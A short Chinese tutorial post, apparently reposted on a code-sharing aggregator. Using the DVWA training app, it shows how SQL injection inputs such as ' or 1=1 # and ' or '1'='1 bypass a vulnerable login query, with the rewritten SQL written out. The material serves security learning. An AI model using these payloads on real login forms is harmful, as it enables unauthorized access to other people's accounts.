SQL 注入基础系列2——利用 SQL 漏洞绕过登录验证 - 代码天地

SQL 注入基础系列2——利用 SQL 漏洞绕过登录验证

其他 2018-12-29 02:54:48 阅读次数: 0

DVWA->SQL Injection

//后台sql语句
select * from users where username='$name' and password='$pwd';

当查询到数据表中存在同时满足 username 和 password 字段的数据时，会返回登录成功。例如，用户名为admin，密码为123时：

//实际执行语句
select * from users where username='admin' and password='123';

使用注释绕过验证

在用户名中输入 123' or 1=1 #，密码中同样输入 123' or 1=1 #

按照 Mysql 语法，# 后面的内容会被注释掉，所以密码也可以不填。

//示例一
SELECT first_name, last_name FROM users WHERE user_id = '123' or 1=1 #';

//示例二
select * from users where username='123' or 1=1 #' and password='123' or 1=1 #';

select * from users where username='123' or 1=1; #' and password='123' or 1=1; #';

不做注释，手动闭合绕过验证

//构造输入 123' or '1'='1
select * from users where username='123' or '1'='1' and password='123' or '1'='1'

两个 or 语句使 and 前后两个判断恒等于真，所以能够成功登录。

猜你喜欢

转载自blog.csdn.net/weixin_37537965/article/details/85262922

SQL 注入基础系列2——利用 SQL 漏洞绕过登录验证

SQL注入绕过登录验证

sql注入漏洞的利用

利用SQL注入漏洞登录后台

利用SQL注入漏洞登录后台利用SQL注入漏洞登录后台

SQL Injection - SQL注入漏洞

SQL注入绕过技巧

sql注入绕过

sql 注入绕过 waf

SQL注入防御绕过

sql注入绕过姿势

sql注入——waf绕过

绕过 SQL 注入

SQL注入（绕过）

SQL注入绕过技术

SQL注入过滤的绕过

SQL注入漏洞基础拓展

SQL注入漏洞发现和利用，以及SQL注入的防护

【转载收藏】利用SQL注入漏洞登录后台

注入漏洞-sql注入

SQL注入笔记05：利用和绕过

sql绕过基础

SQL注入篇——文件上传漏洞的js绕过方法

(SQL)注入漏洞修复

Mysql SQL注入漏洞

SQL注入漏洞原理

SQL注入漏洞笔记

SQL注入漏洞

SQL注入漏洞总结

SQL 注入漏洞

今日推荐

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

GCC 14.1 发布

面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」

开源日报 | 谷歌扶持鸿蒙上位；开源Rabbit R1；Docker加持的安卓手机；微软的焦虑和野心；海尔电器把开放平台关了

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

周排行

Java自定义时间格式

同步整形电路

在开发中最最最常用的字符串的属性大集合

Linux 查看端口占用并杀掉

Java基础四：ArrayList

多线程之死锁就是这么简单

mysql 基础命令集

awk 命令详解

Centos6.3编译安装nginx+php步骤

OCR （Optical Character Recognition，光学字符识别）

每日归档

更多

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)